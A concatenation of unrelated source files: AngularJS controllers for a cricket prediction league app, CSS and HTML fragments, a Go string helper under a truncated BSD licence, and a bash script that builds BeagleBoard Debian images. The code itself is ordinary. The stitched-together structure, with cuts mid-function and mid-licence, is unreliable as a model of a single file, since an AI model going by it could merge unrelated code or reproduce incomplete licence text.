          for (var i=0;i<$scope.leagues.length; i++) {
            if ($scope.leagues[i].name == $cookies.preferredLeague) {
              $scope.selectedLeague = $cookies.preferredLeague;
            }
          }
          if ($scope.selectedLeague == undefined && $scope.leagues.length > 0) {
            $cookies.preferredLeague = $scope.leagues[0].name;
            $scope.selectedLeague = $cookies.preferredLeague;
          }
        }
        CricketMatch.query({predictions:'true', future:'false'},
          function(data, responseHeaders) {
            $scope.matches = data;
            $scope.changeLeague();//Just to set the prediction object on match correct.
          },
          function(httpResponse) {
            $scope.error = "ERROR";
            $scope.errorMessage = httpResponse.data.message;
          }
        );
      },
      function(httpResponse) {
        $scope.error = "ERROR";
        $scope.errorMessage = httpResponse.data.message;
      }
    );
    // Read-only modal showing how a prediction scored.
    $scope.viewPerformanceModal = function(selectedMatch) {
      var modalInstance = $modal.open({
        templateUrl: 'performanceModalContent.html',
        controller: 'PerformanceModalInstanceCtrl',
        //size: 'sm',
        resolve: {
          match: function ()
          {return selectedMatch;},
          prediction: function ()
          {return selectedMatch.prediction;},
          league: function ()
          {return $scope.selectedLeague;}
        }
      });
      modalInstance.result.then(function (prediction) {
        //Do Nothing
      }, function () {
        //When modal is dismissed
      });
    };
  });
/**
 * Read-only modal for viewing a past prediction; OK simply dismisses.
 */
envyLeagueApp.controller('PerformanceModalInstanceCtrl',
  function ($scope, $modalInstance, $filter, CricketPrediction, match, prediction, league) {
    $scope.match = match;
    $scope.selectedLeague = league;
    // Copy so display logic can default fields without mutating the source.
    $scope.prediction = angular.copy(prediction);
    if (angular.isUndefined($scope.prediction.teamWinner)) {
      $scope.prediction.teamWinner = 'Draw';
    }
    $scope.ok = function () {
      $modalInstance.dismiss('ok');
    };
  }
);
/**
 * New-league form: submits a league creation request and distinguishes the
 * "name already in use" failure from other errors.
 */
envyLeagueApp.controller('CricNewLeagueController', function ($scope, CricketLeague) {
  $scope.success = null;
  $scope.error = null;
  $scope.errorLeagueExists = null;
  $scope.request = function() {
    CricketLeague.request($scope.league,
      function (value, responseHeaders) {
        $scope.success = 'OK';
      },
      function (httpResponse) {
        // Server signals a duplicate name with HTTP 400 and this exact body.
        if (httpResponse.status === 400 && httpResponse.data === "League name already in use") {
          $scope.error = null;
          $scope.errorLeagueExists = "ERROR";
        } else {
          $scope.error = "ERROR";
        }
      }
    );
  }
});
/**
 * "All Leagues" view: lists every league visible to the user and lets them
 * request registration; a successful request marks the row as pending
 * locally without re-querying the server.
 */
envyLeagueApp.controller('CricAllLeaguesController', function ($scope, CricketUserLeague) {
  $scope.registerVisible = true;
  CricketUserLeague.query({},
    function(data, responseHeaders) {
      $scope.leagues = data;
    },
    function(httpResponse) {
      $scope.error = "ERROR";
      $scope.errorMessage = httpResponse.data;
    }
  );
  // Request membership in the given league.
  $scope.register = function(data) {
    CricketUserLeague.save(data,
      function(responseData, responseHeaders) {
        // BUG FIX: the original assigned data.userLeague twice in a row,
        // so the second assignment silently discarded the status field.
        // Set both properties in a single object.
        data.userLeague = {status : 'PENDING', statusDescription : 'Pending Approval'};
        $scope.registerVisible = true;
      },
      function(httpResponse) {
        $scope.registerVisible = true;
        $scope.error = "ERROR";
        $scope.errorMessage = httpResponse.data;
      }
    );
  };
});
/**
 * Leaderboard view: resolves the selected league (same cookie flow as the
 * prediction/performance controllers) and loads its leader list.
 */
envyLeagueApp.controller('CricLeadersController',
  function ($scope, $cookies, CricketPrediction, CricketUserLeague, CricketMatch, CricketLeaders, $filter) {
    $scope.error = null;
    CricketUserLeague.query({},
      function(data, responseHeaders) {
        $scope.error = null;
        $scope.errorMessage = null;
        $scope.leagues = $filter('filter')(data, {userLeague: {status: 'ACTIVE'}});
        // NOTE(review): string-compare against 'undefined', as elsewhere.
        if ($cookies.preferredLeague == 'undefined') {
          if ($scope.leagues.length > 0) {
            $cookies.preferredLeague = $scope.leagues[0].name;
            $scope.selectedLeague = $cookies.preferredLeague;
          }
        } else {
          for (var i=0;i<$scope.leagues.length; i++) {
            if ($scope.leagues[i].name == $cookies.preferredLeague) {
              $scope.selectedLeague = $cookies.preferredLeague;
            }
          }
          if ($scope.selectedLeague == undefined && $scope.leagues.length > 0) {
            $cookies.preferredLeague = $scope.leagues[0].name;
            $scope.selectedLeague = $cookies.preferredLeague;
          }
        }
        // Load leaders only when a league could be resolved.
        if ($scope.selectedLeague != undefined) {
          CricketLeaders.query({'league': $scope.selectedLeague},
            function(data, responseHeaders) {
              $scope.users = data;
            },
            function(httpResponse) {
              $scope.error = "ERROR";
              $scope.errorMessage = httpResponse.data.message;
            }
          );
        }
      },
      function(httpResponse) {
        $scope.error = "ERROR";
        $scope.errorMessage = httpResponse.data;
      }
    );
    // Dropdown change handler: persist the choice and reload the board.
    $scope.changeLeague = function() {
      $scope.error = null;
      $scope.users = null;
      $cookies.preferredLeague = $scope.selectedLeague;
      CricketLeaders.query({'league': $scope.selectedLeague},
        function(data, responseHeaders) {
          $scope.users = data;
        },
        function(httpResponse) {
          $scope.error = "ERROR";
          $scope.errorMessage = httpResponse.data;
        }
      );
    }
  });
// Static rules page: no scope state needed; content lives in the template.
envyLeagueApp.controller('CricRulesController', function ($scope) {
});
//Admin Controllers
/**
 * Admin view: lists all leagues and saves administrative edits.
 */
envyLeagueApp.controller('AdminLeagueController', function ($scope, AdminLeague) {
  // Gates the update button while a save is in flight.
  $scope.updateVisible = true;
  AdminLeague.query({},
    function(data, responseHeaders) {
      $scope.leagues = data;
    },
    function(httpResponse) {
      $scope.error = "ERROR";
      $scope.errorMessage = httpResponse.data;
    }
  );
  $scope.update = function(data) {
    $scope.updateVisible = false;
    $scope.error = null;
    $scope.errorMessage = null;
    AdminLeague.save(data,
      function(data, responseHeaders) {
        $scope.updateVisible = true;
      },
      function(httpResponse) {
        $scope.updateVisible = true;
        $scope.error = "ERROR";
        $scope.errorMessage = httpResponse.data;
      }
    );
  };
});
/**
 * Admin view for finalizing match results: loads past matches (without
 * predictions) and submits the chosen winner.
 */
envyLeagueApp.controller('AdminMatchController', function ($scope, CricketMatch, AdminMatch) {
  $scope.updateVisible = true;
  CricketMatch.query({predictions:'false', future:'false'},
    function(data, responseHeaders) {
      $scope.matches = data;
      for (var i=0;i<$scope.matches.length;i++) {
        // NOTE(review): a draw maps to the empty string here, while
        // CricPredictionController uses the literal "Draw" — presumably
        // the admin API stores no winner for a draw; confirm.
        $scope.matches[i].winnerOptions= [
          {value:$scope.matches[i].teamA,display:$scope.matches[i].teamA + ' Winner'},
          {value:"",display:"Draw"},
          {value:$scope.matches[i].teamB,display:$scope.matches[i].teamB + ' Winner'}
        ];
      }
    },
    function(httpResponse) {
      $scope.error = "ERROR";
      $scope.errorMessage = httpResponse.data;
    }
  );
  // Persist the result; mark the row finalized only on success.
  $scope.finalize = function(match) {
    $scope.updateVisible = false;
    AdminMatch.save(match,
      function(data, responseHeaders) {
        $scope.updateVisible = true;
        match.finalized = true;
      },
      function(httpResponse) {
        $scope.updateVisible = true;
        $scope.error = "ERROR";
        $scope.errorMessage = httpResponse.data;
      }
    );
  }
});
/* Base typography for the whole page. */
body {
  font-family: sans-serif;
}
/* Page title banner. */
#title {
  text-align: center;
  font-size: 1.5em;
  font-weight: bold;
}
/* Bottom navigation bar, pinned to the viewport. */
#navigation {
  text-align: center;
  bottom: 0;
  width: 100%;
  position: fixed;
  background: #ddd;
}
/* Navigation links: plain black text with tap-friendly padding. */
#navigation a {
  text-decoration: none;
  padding: 0.5em;
  color: black;
}
/* Welcome message below the title. */
#welcome {
  margin-top: 1.5em;
  text-align: center;
  font-size: 1.2em;
}
<body>
  <!-- App title banner -->
  <div id="title">My App</div>
  <!-- Fixed bottom navigation (styled by #navigation rules) -->
  <div id="navigation">
    <a href="home.html">Home</a>
    <a href="search.html">Search</a>
    <a href="settings.html">Settings</a>
    <a href="profile.html">Profile</a>
    <a href="about.html">About</a>
  </div>
  <!-- Landing message -->
  <div id="welcome">Welcome to My App!</div>
</body>
/*
Copyright (c) 2017, UPMC Enterprises
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name UPMC Enterprises nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL UPMC ENTERPRISES BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
*/
package util
// StringContains reports whether item occurs in list.
func StringContains(item string, list []string) bool {
	for i := range list {
		if list[i] == item {
			return true
		}
	}
	return false
}
|
#!/bin/bash -e
# Build date stamp; used in image names and the mirror directory layout.
time=$(date +%Y-%m-%d)
mirror_dir="/var/www/html/rcn-ee.us/rootfs/bb.org/testing"
DIR="$PWD"
# Sync the image-builder scripts before building.
git pull --no-edit https://github.com/beagleboard/image-builder master
export apt_proxy=apt-proxy:3142/
# Start from a clean deploy directory.
if [ -d ./deploy ] ; then
	sudo rm -rf ./deploy || true
fi
# Unless a jenkins.build marker file exists, generate every rootfs variant.
if [ ! -f jenkins.build ] ; then
	./RootStock-NG.sh -c machinekit-debian-jessie
	./RootStock-NG.sh -c bb.org-debian-jessie-console-v4.4
	./RootStock-NG.sh -c bb.org-debian-jessie-iot-v4.4
	./RootStock-NG.sh -c bb.org-debian-jessie-lxqt-2gb-v4.4
	./RootStock-NG.sh -c bb.org-debian-jessie-lxqt-4gb-v4.4
	./RootStock-NG.sh -c bb.org-debian-jessie-lxqt-4gb-xm
	./RootStock-NG.sh -c seeed-debian-jessie-lxqt-4gb-v4.4
	./RootStock-NG.sh -c seeed-debian-jessie-iot-v4.4
	./RootStock-NG.sh -c bb.org-debian-jessie-oemflasher
	./RootStock-NG.sh -c machinekit-debian-stretch
	./RootStock-NG.sh -c bb.org-debian-stretch-console-v4.9
	./RootStock-NG.sh -c bb.org-debian-stretch-iot-v4.9
	./RootStock-NG.sh -c bb.org-debian-stretch-lxqt-2gb-v4.9
	./RootStock-NG.sh -c bb.org-debian-stretch-lxqt-v4.9
	./RootStock-NG.sh -c bb.org-debian-stretch-lxqt-xm
	./RootStock-NG.sh -c bb.org-debian-stretch-oemflasher-v4.9
	./RootStock-NG.sh -c bb.org-debian-buster-iot-v4.9
else
	mkdir -p ${DIR}/deploy/ || true
fi
# Canonical rootfs archive base names for each variant, keyed by build date.
debian_jessie_machinekit="debian-8.10-machinekit-armhf-${time}"
debian_jessie_console="debian-8.10-console-armhf-${time}"
debian_jessie_iot="debian-8.10-iot-armhf-${time}"
debian_jessie_lxqt_2gb="debian-8.10-lxqt-2gb-armhf-${time}"
debian_jessie_lxqt_4gb="debian-8.10-lxqt-4gb-armhf-${time}"
debian_jessie_lxqt_xm_4gb="debian-8.10-lxqt-xm-4gb-armhf-${time}"
debian_jessie_oemflasher="debian-8.10-oemflasher-armhf-${time}"
debian_jessie_seeed_iot="debian-8.10-seeed-iot-armhf-${time}"
debian_jessie_seeed_lxqt_4gb="debian-8.10-seeed-lxqt-4gb-armhf-${time}"
debian_stretch_machinekit="debian-9.4-machinekit-armhf-${time}"
debian_stretch_console="debian-9.4-console-armhf-${time}"
debian_stretch_iot="debian-9.4-iot-armhf-${time}"
debian_stretch_lxqt_2gb="debian-9.4-lxqt-2gb-armhf-${time}"
debian_stretch_lxqt="debian-9.4-lxqt-armhf-${time}"
debian_stretch_lxqt_xm="debian-9.4-lxqt-xm-armhf-${time}"
debian_stretch_wayland="debian-9.4-wayland-armhf-${time}"
debian_stretch_oemflasher="debian-9.4-oemflasher-armhf-${time}"
debian_buster_iot="debian-buster-iot-armhf-${time}"
# Compression commands: single-threaded for images, 2 threads for tarballs.
xz_img="xz -z -8"
#xz_tar="xz -z -8"
xz_tar="xz -T2 -z -8"
# Common setup_sdcard.sh option bundles per board family.
beaglebone="--dtb beaglebone --rootfs_label rootfs --hostname beaglebone --enable-uboot-cape-overlays"
pru_rproc_v44ti="--enable-uboot-pru-rproc-44ti"
pru_rproc_v49ti="--enable-uboot-pru-rproc-49ti"
pru_rproc_v414ti="--enable-uboot-pru-rproc-414ti"
beagle_xm="--dtb omap3-beagle-xm --rootfs_label rootfs --hostname beagleboard"
beagle_x15="--dtb am57xx-beagle-x15 --rootfs_label rootfs \
--hostname BeagleBoard-X15"
cat > ${DIR}/deploy/gift_wrap_final_images.sh <<-__EOF__
#!/bin/bash
wait_till_Xgb_free () {
memory=4096
free_memory=\$(free --mega | grep Mem | awk '{print \$7}')
until [ "\$free_memory" -gt "\$memory" ] ; do
free_memory=\$(free --mega | grep Mem | awk '{print \$7}')
echo "have [\$free_memory] need [\$memory]"
sleep 10
done
}
copy_base_rootfs_to_mirror () {
wait_till_Xgb_free
if [ -d ${mirror_dir}/ ] ; then
if [ ! -d ${mirror_dir}/${time}/\${blend}/ ] ; then
mkdir -p ${mirror_dir}/${time}/\${blend}/ || true
fi
if [ -d ${mirror_dir}/${time}/\${blend}/ ] ; then
if [ ! -f ${mirror_dir}/${time}/\${blend}/\${base_rootfs}.tar.xz ] ; then
cp -v \${base_rootfs}.tar ${mirror_dir}/${time}/\${blend}/
cd ${mirror_dir}/${time}/\${blend}/
${xz_tar} \${base_rootfs}.tar && sha256sum \${base_rootfs}.tar.xz > \${base_rootfs}.tar.xz.sha256sum &
cd -
fi
fi
fi
}
archive_base_rootfs () {
if [ -d ./\${base_rootfs} ] ; then
rm -rf \${base_rootfs} || true
fi
if [ -f \${base_rootfs}.tar ] ; then
copy_base_rootfs_to_mirror
fi
}
extract_base_rootfs () {
if [ -d ./\${base_rootfs} ] ; then
rm -rf \${base_rootfs} || true
fi
if [ -f \${base_rootfs}.tar.xz ] ; then
tar xf \${base_rootfs}.tar.xz
fi
if [ -f \${base_rootfs}.tar ] ; then
tar xf \${base_rootfs}.tar
fi
}
copy_img_to_mirror () {
wait_till_Xgb_free
if [ -d ${mirror_dir} ] ; then
if [ ! -d ${mirror_dir}/${time}/\${blend}/ ] ; then
mkdir -p ${mirror_dir}/${time}/\${blend}/ || true
fi
if [ -d ${mirror_dir}/${time}/\${blend}/ ] ; then
if [ ! -f ${mirror_dir}/${time}/\${blend}/\${wfile}.img.zx ] ; then
mv -v \${wfile}.img ${mirror_dir}/${time}/\${blend}/
sync
if [ -f \${wfile}.img.xz.job.txt ] ; then
mv -v \${wfile}.img.xz.job.txt ${mirror_dir}/${time}/\${blend}/
sync
fi
cd ${mirror_dir}/${time}/\${blend}/
${xz_img} \${wfile}.img && sha256sum \${wfile}.img.xz > \${wfile}.img.xz.sha256sum &
cd -
fi
fi
fi
}
archive_img () {
if [ -f \${wfile}.img ] ; then
copy_img_to_mirror
fi
}
generate_img () {
if [ -d \${base_rootfs}/ ] ; then
cd \${base_rootfs}/
sudo ./setup_sdcard.sh \${options}
sudo chown 1000:1000 *.img || true
sudo chown 1000:1000 *.job.txt || true
mv *.img ../ || true
mv *.job.txt ../ || true
cd ..
fi
}
###machinekit (jessie):
base_rootfs="${debian_jessie_machinekit}" ; blend="machinekit" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
###console images (jessie):
base_rootfs="${debian_jessie_console}" ; blend="console" ; extract_base_rootfs
options="--img-1gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-1gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti}" ; generate_img
options="--img-1gb a335-eeprom-\${base_rootfs} ${beaglebone} --a335-flasher" ; generate_img
options="--img-1gb bp00-eeprom-\${base_rootfs} ${beaglebone} --bp00-flasher" ; generate_img
options="--img-1gb am57xx-x15-eeprom-\${base_rootfs} ${beagle_x15} --emmc-flasher --am57xx-x15-revc-flasher" ; generate_img
options="--img-1gb am571x-sndrblock-eeprom-\${base_rootfs} ${beagle_x15} --emmc-flasher --am571x-sndrblock-flasher" ; generate_img
#options="--img-1gb me06-blank-\${base_rootfs} ${beaglebone} --me06-flasher" ; generate_img
#options="--img-1gb BBB-blank-\${base_rootfs} ${beaglebone} --emmc-flasher" ; generate_img
#options="--img-1gb bbx15-blank-\${base_rootfs} ${beagle_x15} --emmc-flasher" ; generate_img
###iot image (jessie):
base_rootfs="${debian_jessie_iot}" ; blend="iot" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --emmc-flasher" ; generate_img
options="--img-4gb BBBL-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --bbbl-flasher" ; generate_img
#options="--img-4gb BBB-blank-uboot-overlay-\${base_rootfs} ${beaglebone} --emmc-flasher ${overlay}" ; generate_img
#options="--img-4gb BBBW-blank-\${base_rootfs} ${beaglebone} --bbbw-flasher" ; generate_img
###lxqt-2gb image (jessie):
base_rootfs="${debian_jessie_lxqt_2gb}" ; blend="lxqt-2gb" ; extract_base_rootfs
options="--img-2gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-2gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
###lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_4gb}" ; blend="lxqt-4gb" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bbx15-blank-\${base_rootfs} ${beagle_x15} --emmc-flasher --am57xx-x15-revc-flasher" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --emmc-flasher" ; generate_img
options="--img-4gb BBBW-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --bbbw-flasher" ; generate_img
#options="--img-4gb BBB-blank-uboot-overlay-\${base_rootfs} ${beaglebone} --emmc-flasher ${overlay}" ; generate_img
#options="--img-4gb m10a-blank-\${base_rootfs} ${beaglebone} --m10a-flasher" ; generate_img
###lxqt-xm-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_xm_4gb}" ; blend="lxqt-xm-4gb" ; extract_base_rootfs
options="--img-4gb bbxm-\${base_rootfs} ${beagle_xm}" ; generate_img
###Seeed iot image (jessie):
base_rootfs="${debian_jessie_seeed_iot}" ; blend="seeed-iot" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
#options="--img-4gb BBGW-blank-\${base_rootfs} ${beaglebone} --bbgw-flasher" ; generate_img
###Seeed lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_seeed_lxqt_4gb}" ; blend="seeed-lxqt-4gb" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
#options="--img-4gb BBG-blank-\${base_rootfs} ${beaglebone} --bbg-flasher" ; generate_img
###machinekit (stretch):
base_rootfs="${debian_stretch_machinekit}" ; blend="stretch-machinekit" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
###console image (stretch):
base_rootfs="${debian_stretch_console}" ; blend="stretch-console" ; extract_base_rootfs
options="--img-1gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-1gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
###iot image (stretch):
base_rootfs="${debian_stretch_iot}" ; blend="stretch-iot" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
options="--img-4gb BBBL-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --bbbl-flasher" ; generate_img
###lxqt-2gb image (stretch):
base_rootfs="${debian_stretch_lxqt_2gb}" ; blend="stretch-lxqt-2gb" ; extract_base_rootfs
options="--img-2gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-2gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
###lxqt image (stretch):
base_rootfs="${debian_stretch_lxqt}" ; blend="stretch-lxqt" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bbx15-blank-\${base_rootfs} ${beagle_x15} --emmc-flasher --am57xx-x15-revc-flasher" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
###lxqt image (stretch):
base_rootfs="${debian_stretch_lxqt_xm}" ; blend="stretch-lxqt-xm" ; extract_base_rootfs
options="--img-4gb bbxm-\${base_rootfs} ${beagle_xm}" ; generate_img
### wayland image (stretch):
base_rootfs="${debian_stretch_wayland}" ; blend="stretch-wayland" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
###iot image (buster):
base_rootfs="${debian_buster_iot}" ; blend="buster-iot" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti} --emmc-flasher" ; generate_img
#options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti} --rootfs btrfs" ; generate_img
#options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti} --rootfs btrfs --emmc-flasher" ; generate_img
###archive *.tar
base_rootfs="${debian_jessie_machinekit}" ; blend="machinekit" ; archive_base_rootfs
base_rootfs="${debian_jessie_console}" ; blend="console" ; archive_base_rootfs
base_rootfs="${debian_jessie_iot}" ; blend="iot" ; archive_base_rootfs
base_rootfs="${debian_jessie_lxqt_2gb}" ; blend="lxqt-2gb" ; archive_base_rootfs
base_rootfs="${debian_jessie_lxqt_4gb}" ; blend="lxqt-4gb" ; archive_base_rootfs
base_rootfs="${debian_jessie_lxqt_xm_4gb}" ; blend="lxqt-xm-4gb" ; archive_base_rootfs
base_rootfs="${debian_jessie_oemflasher}" ; blend="oemflasher" ; archive_base_rootfs
base_rootfs="${debian_jessie_seeed_iot}" ; blend="seeed-iot" ; archive_base_rootfs
base_rootfs="${debian_jessie_seeed_lxqt_4gb}" ; blend="seeed-lxqt-4gb" ; archive_base_rootfs
base_rootfs="${debian_stretch_machinekit}" ; blend="stretch-machinekit" ; archive_base_rootfs
base_rootfs="${debian_stretch_console}" ; blend="stretch-console" ; archive_base_rootfs
base_rootfs="${debian_stretch_iot}" ; blend="stretch-iot" ; archive_base_rootfs
base_rootfs="${debian_stretch_lxqt_2gb}" ; blend="stretch-lxqt-2gb" ; archive_base_rootfs
base_rootfs="${debian_stretch_lxqt}" ; blend="stretch-lxqt" ; archive_base_rootfs
base_rootfs="${debian_stretch_lxqt_xm}" ; blend="stretch-lxqt-xm" ; archive_base_rootfs
base_rootfs="${debian_stretch_wayland}" ; blend="stretch-wayland" ; archive_base_rootfs
base_rootfs="${debian_stretch_oemflasher}" ; blend="stretch-oemflasher" ; archive_base_rootfs
base_rootfs="${debian_buster_iot}" ; blend="buster-iot" ; archive_base_rootfs
###archive *.img
###machinekit (jessie):
base_rootfs="${debian_jessie_machinekit}" ; blend="machinekit"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###console images (jessie):
base_rootfs="${debian_jessie_console}" ; blend="console"
wfile="bbx15-\${base_rootfs}-1gb" ; archive_img
wfile="bone-\${base_rootfs}-1gb" ; archive_img
wfile="a335-eeprom-\${base_rootfs}-1gb" ; archive_img
wfile="bp00-eeprom-\${base_rootfs}-1gb" ; archive_img
wfile="am57xx-x15-eeprom-\${base_rootfs}-1gb" ; archive_img
wfile="am571x-sndrblock-eeprom-\${base_rootfs}-1gb" ; archive_img
###iot image (jessie):
base_rootfs="${debian_jessie_iot}" ; blend="iot"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
wfile="BBBL-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-2gb image (jessie):
base_rootfs="${debian_jessie_lxqt_2gb}" ; blend="lxqt-2gb"
wfile="bone-\${base_rootfs}-2gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-2gb" ; archive_img
###lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_4gb}" ; blend="lxqt-4gb"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bbx15-blank-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
wfile="BBBW-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-xm-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_xm_4gb}" ; blend="lxqt-xm-4gb"
wfile="bbxm-\${base_rootfs}-4gb" ; archive_img
###Seeed iot image (jessie):
base_rootfs="${debian_jessie_seeed_iot}" ; blend="seeed-iot"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###Seeed lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_seeed_lxqt_4gb}" ; blend="seeed-lxqt-4gb"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###machinekit (stretch):
base_rootfs="${debian_stretch_machinekit}" ; blend="stretch-machinekit"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###console image (stretch):
base_rootfs="${debian_stretch_console}" ; blend="stretch-console"
wfile="bbx15-\${base_rootfs}-1gb" ; archive_img
wfile="bone-\${base_rootfs}-1gb" ; archive_img
###iot image (stretch):
base_rootfs="${debian_stretch_iot}" ; blend="stretch-iot"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
wfile="BBBL-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-2gb image (stretch):
base_rootfs="${debian_stretch_lxqt_2gb}" ; blend="stretch-lxqt-2gb"
wfile="bone-\${base_rootfs}-2gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-2gb" ; archive_img
###lxqt image (stretch):
base_rootfs="${debian_stretch_lxqt}" ; blend="stretch-lxqt"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bbx15-blank-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-xm image (stretch):
base_rootfs="${debian_stretch_lxqt_xm}" ; blend="stretch-lxqt-xm"
wfile="bbxm-\${base_rootfs}-4gb" ; archive_img
### wayland image (stretch):
base_rootfs="${debian_stretch_wayland}" ; blend="stretch-wayland"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###iot image (buster):
base_rootfs="${debian_buster_iot}" ; blend="buster-iot"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
__EOF__
chmod +x ${DIR}/deploy/gift_wrap_final_images.sh
image_prefix="bb.org"
# Publish the generated images/script either to an NFS-mounted build-farm
# share (build node) or directly into the web root (x86 server host).
#node:
if [ ! -d /var/www/html/farm/images/ ] ; then
if [ ! -d /mnt/farm/images/ ] ; then
# Share not mounted yet; mount everything from /etc/fstab.
#nfs mount...
sudo mount -a
fi
# Only copy if the mount actually came up; every step is best-effort
# (|| true) so a partial farm outage does not abort the build.
if [ -d /mnt/farm/images/ ] ; then
mkdir -p /mnt/farm/images/${image_prefix}-${time}/ || true
echo "Copying: *.tar to server: images/${image_prefix}-${time}/"
cp -v ${DIR}/deploy/*.tar /mnt/farm/images/${image_prefix}-${time}/ || true
cp -v ${DIR}/deploy/gift_wrap_final_images.sh /mnt/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
chmod +x /mnt/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
fi
fi
# Web-server host: drop the wrap script straight into the web root.
# NOTE(review): unlike the node branch, *.tar archives are not copied here —
# presumably they are produced in place; confirm against the full script.
#x86:
